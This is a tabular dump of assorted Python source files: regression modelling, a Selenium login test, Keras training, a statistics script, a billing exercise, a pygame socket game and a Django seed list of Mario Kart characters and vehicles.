index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
7,100 | d17081ef94df1e14308128341d040559edb81805 | #This file was created by Tate Hagan
from RootGUI import RootGUI
root = RootGUI()
root.mainloop() |
7,101 | f07b95a3b18aecf6cadaa8398c9158a7cd10aeeb | # -*- coding: utf-8 -*-
"""
Created on Sun Oct 4 12:14:16 2020
@author: mdevasish
"""
import pandas as pd
import numpy as np
from sklearn.linear_model import LinearRegression,Lasso,Ridge
from sklearn.metrics import mean_squared_error,mean_absolute_error
from sklearn.model_selection import train_test_split
import joblib
import seaborn as sns
import matplotlib.pyplot as plt
class model_construction:
def __init__(self,data,model,fit_intercept = True,alpha = 1.0, max_iter = 1000, solver = 'auto'):
'''
Constructor to set the values before creating the model
Input Parameters :
data : Input DataFrame
model : Model to be implemented
alpha : Regularization constant applicable for Ridge and Lasso
max_iter : Maximimum iterations applicable for Lasso
solver : Type of solver to use applicable for Ridge
'''
self.data = data
self.alpha = alpha
self.max_iter = max_iter
self.solver = solver
self.fit_intercept = fit_intercept
if model == 'LinearRegression':
self.model = LinearRegression(fit_intercept = self.fit_intercept)
elif model == 'Lasso':
self.model = Lasso(alpha = self.alpha,max_iter = self.max_iter,fit_intercept = self.fit_intercept)
elif model == 'Ridge':
self.model = Ridge(alpha = self.alpha,solver = self.solver,fit_intercept = self.fit_intercept)
else:
raise Exception('Wrong input model')
def implement_model(self,filename):
'''
Method inside the model_construction class, used for implementing the model
and return feature importance and dataframe with actual values and predicted values of validation set
Input :
tsize : size of the dataset for the validation default value 0.3
random_val : Seed for randomness for reproducibility default value 2020
Returns :
fimp : Feature importance of a model
diag : diagnostic dataframe with actual values and predicted values of validation set
'''
df = self.data
model = self.model
X,y = df.iloc[:,:-1],df.iloc[:,-1]
X_train,X_val,y_train,y_val = train_test_split(X,y,test_size = 0.3,random_state = 2020)
model.fit(X_train,y_train)
print('R square score on train set and test set are :',model.score(X_train,y_train),model.score(X_val,y_val))
print('Root mean squared error on test set is :',np.sqrt(mean_squared_error(y_val,model.predict(X_val))))
print('Mean absolute error on test set is :',mean_absolute_error(y_val,model.predict(X_val)))
fimp = pd.DataFrame(zip(X.columns,model.coef_),columns = ['feat','coeff']).sort_values(by = 'coeff',ascending = False)
fimp['abs_coeff'] = fimp['coeff'].apply(lambda x : x if x > 0 else -x)
fimp['rel'] = fimp['coeff'].apply(lambda x : 'pos' if x > 0 else 'neg')
fimp['rel'] = fimp['rel'].astype('category')
fimp = fimp.sort_values(by = 'abs_coeff',ascending = False)
pred = model.predict(X_val)
diag = pd.DataFrame(zip(y_val,pred),columns = ['Ground Truth','Predicted'])
full_name = './Models/'+filename+'.sav'
joblib.dump(model, full_name)
return fimp,diag
def plot_feat_imp(self,fimp,title):
'''
Method inside the model_construction class, used for creating a feature importance plot
Input :
fimp : Dataframe with feature importance
title : Title of the plot
Displays a plot
'''
plt.figure(figsize = (18,12))
sns.barplot(y = 'feat', x = 'abs_coeff', hue = 'rel',data = fimp)
plt.title('Feature Importance plot for '+title)
def plot_diagnostic(self,diag):
'''
Method inside the model_construction class, used for creating a diagnostic plot ground truth vs predicted
Input :
diag : Dataframe with feature importance
Displays a plot
'''
plt.figure(figsize = (18,9))
g = sns.scatterplot(x = 'Ground Truth', y = 'Predicted',data = diag)
plt.title('Ground Truth vs Predicted on validation Data')
plt.show()
|
7,102 | d9bf58dc76d4e8d7146fac3bb2bdfb538ebf78a5 | '''import pyttsx3
#engine = pyttsx3.init()
#Conficuraรงรฃo das vozes
#voices = engine.getProperty('voices')
#engine.setProperty('voice', voices[2].id)
engine=pyttsx3.init()
voices=engine.getProperty('voices')
engine.setProperty('voice',voices[3].id)
#Falar texto
engine.say('Olรก meu nome รฉ Jarvis. Sou uma inteligรชncia artificial')
engine.runAndWait()
#print(voices)
#Printa na tela todas as vozes disponรญveis'''
'''for voice in voices:
print("Voice: %s" % voice.name)
print(" - ID: %s" % voice.id)
print(" - Languages: %s" % voice.languages)
print(" - Gender: %s" % voice.gender)
print(" - Age: %s" % voice.age)
print("\n")'''
|
7,103 | 87f8cc65cf7d0ea932de79a6daf5b29ad387ec6f | # Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class TestSTCHANGE():
def setup_method(self, method):
self.driver = webdriver.Chrome()
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
def test_sTCHANGE(self):
# Test name: ST CHANGE
# Step # | name | target | value
# 1 | open | /main/desktop-login.html |
self.driver.get("http://10.51.30.52:8090/main/desktop-login.html")
# 2 | setWindowSize | 976x696 |
self.driver.set_window_size(976, 696)
# 3 | click | id=idInputUsername |
self.driver.find_element(By.ID, "idInputUsername").click()
# 4 | type | id=idInputUsername | SUPERVISOR
self.driver.find_element(By.ID, "idInputUsername").send_keys("SUPERVISOR")
# 5 | click | id=login-panel |
self.driver.find_element(By.ID, "login-panel").click()
# 6 | click | id=idInputPassword |
self.driver.find_element(By.ID, "idInputPassword").click()
# 7 | type | id=idInputPassword | **
self.driver.find_element(By.ID, "idInputPassword").send_keys("**")
# 8 | click | id=submit.button |
self.driver.find_element(By.ID, "submit.button").click()
# 9 | click | id=BVMAPS |
self.driver.find_element(By.ID, "BVMAPS").click()
# 10 | click | css=#UI_BADGES_GRID\.gridView\.row\#22_Tcell\#0 > div > div |
self.driver.find_element(By.CSS_SELECTOR, "#UI_BADGES_GRID\\.gridView\\.row\\#22_Tcell\\#0 > div > div").click()
# 11 | click | id=badge.html.ribbon.properties |
self.driver.find_element(By.ID, "badge.html.ribbon.properties").click()
# 12 | click | id=__selection_4 |
self.driver.find_element(By.ID, "__selection_4").click()
# 13 | mouseDown | css=#\__pan_4 > .listItemNormal:nth-child(2) |
element = self.driver.find_element(By.CSS_SELECTOR, "#\\__pan_4 > .listItemNormal:nth-child(2)")
actions = ActionChains(self.driver)
actions.move_to_element(element).click_and_hold().perform()
# 14 | mouseUp | id=__selection_5 |
element = self.driver.find_element(By.ID, "__selection_5")
actions = ActionChains(self.driver)
actions.move_to_element(element).release().perform()
# 15 | click | css=#PROPERTIES_CONTROLS td:nth-child(2) .middlePart |
self.driver.find_element(By.CSS_SELECTOR, "#PROPERTIES_CONTROLS td:nth-child(2) .middlePart").click()
# 16 | click | id=badge.html.ribbon.properties.apply |
self.driver.find_element(By.ID, "badge.html.ribbon.properties.apply").click()
# 17 | click | css=body > img |
self.driver.find_element(By.CSS_SELECTOR, "body > img").click()
# 18 | click | css=a > img |
self.driver.find_element(By.CSS_SELECTOR, "a > img").click()
# 19 | click | id=main.html.btn_logout |
self.driver.find_element(By.ID, "main.html.btn_logout").click()
|
7,104 | 94b3fa700d7da0ca913adeb0ad5324d1fec0be50 | import os
import pandas as pd
import numpy as np
from dataloader import *
from keras.optimizers import Adam, SGD
from mylib.models.misc import set_gpu_usage
set_gpu_usage()
from mylib.models import densesharp, metrics, losses
from keras.callbacks import ModelCheckpoint, CSVLogger, TensorBoard, EarlyStopping, ReduceLROnPlateau, \
LearningRateScheduler
os.environ['CUDA_VISIBLE_DEVICES'] = '/gpu:0'
def main(batch_size, crop_size, learning_rate, segmentation_task_ratio, weight_decay, save_folder, epochs,
alpha):
print(learning_rate)
print(alpha)
print(weight_decay)
train_dataset = ClfSegDataset(subset=[0, 1])
train_loader = get_mixup_loader(train_dataset, batch_size=batch_size, alpha=alpha)
val_dataset = ClfvalSegDataset(crop_size=crop_size, move=None, subset=[2])
val_loader = get_loader(val_dataset, batch_size=batch_size)
model = densesharp.get_compiled(output_size=1,
optimizer=Adam(lr=learning_rate),
loss={"clf": 'binary_crossentropy',
"seg": losses.DiceLoss()},
metrics={'clf': ['accuracy', metrics.precision, metrics.recall, metrics.fmeasure,
metrics.auc],
'seg': [metrics.precision, metrics.recall, metrics.fmeasure]},
loss_weights={"clf": 1., "seg": segmentation_task_ratio},
weight_decay=weight_decay, weights='tmp/test/weights42_222639.h5')
checkpointer = ModelCheckpoint(filepath='tmp/%s/weights.{epoch:02d}.h5' % save_folder, verbose=1,
period=1, save_weights_only=True)
csv_logger = CSVLogger('tmp/%s/training.csv' % save_folder)
tensorboard = TensorBoard(log_dir='tmp/%s/logs/' % save_folder)
best_keeper = ModelCheckpoint(filepath='tmp/%s/best.h5' % save_folder, verbose=1, save_weights_only=True,
monitor='val_clf_acc', save_best_only=True, period=1, mode='max')
early_stopping = EarlyStopping(monitor='val_clf_acc', min_delta=0, mode='max',
patience=20, verbose=1)
lr_reducer = ReduceLROnPlateau(monitor='val_loss', factor=0.334, patience=10,
verbose=1, mode='min', epsilon=1.e-5, cooldown=2, min_lr=0)
model.fit_generator(generator=train_loader, steps_per_epoch=50, max_queue_size=10, workers=1,
validation_data=val_loader, epochs=epochs, validation_steps=50,
callbacks=[checkpointer, csv_logger, best_keeper, early_stopping, lr_reducer, tensorboard])
if __name__ == '__main__':
main(batch_size=32,
crop_size=[32, 32, 32],
learning_rate=1.e-5,
segmentation_task_ratio=0.2,
weight_decay=0.0,
save_folder='test',
epochs=10,
alpha=1.0) |
7,105 | 0158141832423b567f252e38640e384cdf340f8b | # question 1d
# points: 6
import sys
import numpy as np
from astropy.stats import kuiper
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import handin2 as nur
def main():
seed = 8912312
np.random.seed(8912312)
u = 0
sigma = 1
cdf = nur.gaussian_cdf
num_samples = np.logspace(1,5,num=50)
sample_size = int(1e5)
my_k = np.zeros(50)
my_p = np.zeros(50)
pyth_k = np.zeros(50)
pyth_p = np.zeros(50)
# random number params
x = np.zeros(sample_size)
y = np.zeros(sample_size)
xn = np.zeros(sample_size)
yn = np.zeros(sample_size)
# want to generate one sample of 1e5 numbers then take slices
for i in range(sample_size):
x[i],seed = nur.rng(seed)
xn[i],yn[i] = nur.normalize_random_distribution(x[i],y[i],u,sigma)
for i,s in enumerate(num_samples):
# slice of x at given s
x_s = xn[:int(s)]
x_k = x[:int(s)]
my_k[i],my_p[i] = nur.kuiper_test(x_s,cdf)
pyth_k[i],pyth_p[i] = kuiper(x_k)
# plotting procedure
plt.figure(1,figsize=(7,5))
plt.plot(num_samples,my_k,c='b',ls='None',marker='.',markersize=1,
label='my kuiper test')
plt.plot(num_samples,pyth_k,c='r',ls='None',marker='s',markersize=1,
label='astropy kuiper test')
plt.xscale('log')
plt.xlabel("number of points")
plt.ylabel("kuiper statistic")
plt.legend()
plt.savefig('./plots/kuiper_stat.png',format='png',dpi=300)
plt.figure(2,figsize=(7,5))
plt.plot(num_samples,my_p,c='b',label='my probabilities')
plt.plot(num_samples,pyth_p,c='r',label='astropy probabilities')
plt.xscale('log')
plt.xlabel('sample size')
plt.ylabel('probabilties')
plt.legend(frameon=False,loc='best')
plt.savefig('./plots/k_prob.png',format='png',dpi=300)
if __name__ == '__main__':
sys.exit(main())
|
7,106 | b11210e73b403bc7a9ee24a53201ab2366ec1808 | class item():
def __init__(self,iname,itq,iup):
self.iname = iname
self.itq = itq
self.iup = iup
class store():
def __init__(self,dic):
self.dic = dic
def add(self,iname,itq,iup):
i = item(iname,itq,iup)
self.dic[iname]=[itq,iup]
def callbill(self,rname,rq):
#print("ih"self.dic[rname][0],,self.dic[rname][1])
for i in range(0,len(self.dic)):
if rname in self.dic.keys():
#print(self.dic.keys(ranme))
if(self.dic[rname][0]==0):
return(None)
elif(self.dic[rname][0]>=rq):
tem = self.dic[rname][1]*rq
self.dic[rname][0] = self.dic[rname][0]-rq
return(tem)
elif(self.dic[rname][0]<rq):
tem = self.dic[rname][1]*self.dic[rname][0]
self.dic[rname][0] = 0
return(tem)
else:
return(None)
def pri(self):
for i in self.dic.keys():
print(i,(self.dic.get(i))[0])
n = int(input())
dic = {}
s = store(dic)
for i in range (0,n):
iname = input()
iup = int(input())
itq = int(input())
s.add(iname,itq,iup)
#s.pri()
r = int(input())
for i in range(0,r):
rname = input()
rq = int(input())
print("Bill of item",rname,"=",s.callbill(rname,rq))
s.pri()
|
7,107 | 418798369578e80ecbf82da802b23dc6ca922569 | import pickle
import select
import socket
import sys
from threading import Thread
from typing import Dict, Tuple
import pygame
from pygame.locals import *
import c
from models import *
class Game:
location: list[int, int] = [c.WIDTH / 2, c.HEIGHT / 2]
velocity: list[int, int] = [0, 0]
current_player: Player = None
other_players: Dict[str, Tuple[Player, Tuple[int, int]]] = {}
connection: socket.socket
font: pygame.font.Font
def __init__(self):
pygame.init()
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.screen = pygame.display.set_mode((c.WIDTH, c.HEIGHT))
pygame.display.set_caption('Socket Game')
self.clock = pygame.time.Clock()
self.screen.fill('white')
self.font = pygame.font.SysFont(None, c.FONT_SIZE)
def start(self):
self.connect_to_server()
while True:
self.game_loop()
def connect_to_server(self):
self.connection.connect((c.HOST, c.PORT))
def listen_to_server(self):
ins, outs, ex = select.select([self.connection], [], [], 0)
for inm in ins:
received_data = inm.recv(c.BUFFSIZE)
event: Event = pickle.loads(received_data)
print("<<<", event)
if isinstance(event, CurrentPlayerEvent):
pygame.display.set_caption(f'Socket Game - {event.player.nickname}')
self.current_player = event.player
elif isinstance(event, PlayerDidMoveEvent):
self.update_player(event.player, event.location)
elif isinstance(event, PlayerJoinedEvent):
self.update_player(event.player)
def update_player(self, player: Player, location=(c.WIDTH / 2, c.HEIGHT / 2)):
self.other_players[player.nickname] = (player, location)
def update_server(self):
if self.current_player is not None:
self.connection.send(pickle.dumps(PlayerDidMoveEvent(self.current_player, (
self.location[0], self.location[1],
))))
def game_loop(self):
self.listen_to_server()
self.event_handling()
self.update_location()
self.render()
self.update_server()
self.clock.tick(60)
def update_location(self):
oldx, oldy = self.location
vx, vy = self.velocity
newx, newy = oldx + vx, oldy + vy
if newx > c.WIDTH - c.PLAYER_SIZE:
newx = c.WIDTH - c.PLAYER_SIZE
if newx < 0:
newx = 0
if newy > c.HEIGHT - c.PLAYER_SIZE:
newy = c.HEIGHT - c.PLAYER_SIZE
if newy < 0:
newy = 0
self.location = [newx, newy]
def render_player(self, player: Player, location: Tuple[int, int]):
x, y = location
img = self.font.render(player.nickname, True, player.color)
pygame.draw.rect(self.screen, player.color, (x, y, c.PLAYER_SIZE, c.PLAYER_SIZE))
self.screen.blit(img, (x, y - img.get_height()))
def render(self):
self.screen.fill((255, 255, 255))
if self.current_player is not None:
self.render_player(self.current_player, (self.location[0], self.location[1]))
for nickname, (player, location) in self.other_players.items():
self.render_player(player, location)
pygame.display.flip()
def event_handling(self):
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
if event.type == KEYDOWN:
if event.key == K_LEFT: self.velocity[0] = -c.MOVEMENT_SPEED
if event.key == K_RIGHT: self.velocity[0] = c.MOVEMENT_SPEED
if event.key == K_UP: self.velocity[1] = -c.MOVEMENT_SPEED
if event.key == K_DOWN: self.velocity[1] = c.MOVEMENT_SPEED
if event.type == KEYUP:
if event.key == K_LEFT: self.velocity[0] = 0
if event.key == K_RIGHT: self.velocity[0] = 0
if event.key == K_UP: self.velocity[1] = 0
if event.key == K_DOWN: self.velocity[1] = 0
if __name__ == "__main__":
s = Game()
s.start()
|
7,108 | dbda5df7dff3f8acc320ffe7b9c7c279ebed2cc2 | import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE','mkrandom.settings')
import django
django.setup()
from main.models import Character, Vehicle, Tire, Glider
char_names = [
'Mario',
'Luigi',
'Peach',
'Daisy',
'Rosalina',
'Mario Tanooki',
'Peach cat',
'Yoshi',
'Yoshi (LBlue)',
'Yoshi (Black)',
'Yoshi (Rose)',
'Yoshi (Yellow)',
'Yoshi (White)',
'Yoshi (Blue)',
'Yoshi (Rose)',
'Yoshi (Orange)',
'Toad',
'Koopa',
'Shyguy',
'Shyguy (LB)',
'Shyguy (Black)',
'Shyguy (Rose)',
'Shyguy (Yellow)',
'Shyguy (White)',
'Shyguy (Blue)',
'Shyguy (Rose)',
'Shyguy (Orange)',
'Lakitu',
'Toadette',
'Boo',
'Baby Mario',
'Baby Luigi',
'Baby Peach',
'Baby Daisy',
'Baby Rosalina',
'Metal Mario',
'Golden Mario',
'Golden Peach',
'Wario',
'Waluigi',
'Donkey Kong',
'Bowser',
'Skelerex',
'Bowser Jr',
'Dry Bowser',
'Lemmy',
'Larry',
'Wendy',
'Ludwig',
'Iggy',
'Roy',
'Morton',
'Inkling (G)',
'Inkling (B)',
'Link (SSBU)',
'Link (BOTW)',
'Villager (B)',
'Villager(G)',
'Mary',
]
char_urls = [
'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr',
'https://freepngimg.com/thumb/categories/462.png',
'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr',
'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png',
'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png',
'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809',
'https://www.123-stickers.com/5731-6069-large/Array.jpg',
'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr',
'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr',
'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr',
'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png',
'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png',
'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr',
'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo',
'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png',
'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM',
'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ',
'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708',
'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649',
'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910',
'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014',
'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222',
'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png',
'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png',
'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117',
'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',
'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323',
'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8',
'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',
'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141',
'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr',
'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525',
'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr',
'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png',
'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png',
'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129',
'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png',
'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr',
'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr',
'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112',
'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405',
'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png',
'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png',
'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543',
'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en',
'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png',
'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr',
]
car_names = [
'Standard Kart',
'Pipe Frame',
'Mach 8',
'Steel Driver',
'Cat Cruiser',
'Circuit Special',
'Tri-Speeder',
'Badwagon',
'Prancer',
'Biddybuggy',
'Landship',
'Sneeker',
'Sports Coupe',
'Gold Standard',
'GLA',
'W 25 Silver Arrow',
'300 SL Roadster',
'Blue Falcon',
'Tanooki Kart',
'B Dasher',
'Streetle',
'P-Wing',
'Koopa Clown',
'Standard Bike',
'Comet',
'Sport Bike',
'The Duke',
'Flame Rider',
'Varmint',
'Mr. Scooty',
'Jet Bike',
'Yoshi Bike',
'Master Cycle',
'Master Cycle Zero',
'City Tripper',
'Standard ATV',
'Wild Wiggler',
'Teddy Buggy',
'Bone Rattler',
'Splat Buggy',
'Inkstriker',
]
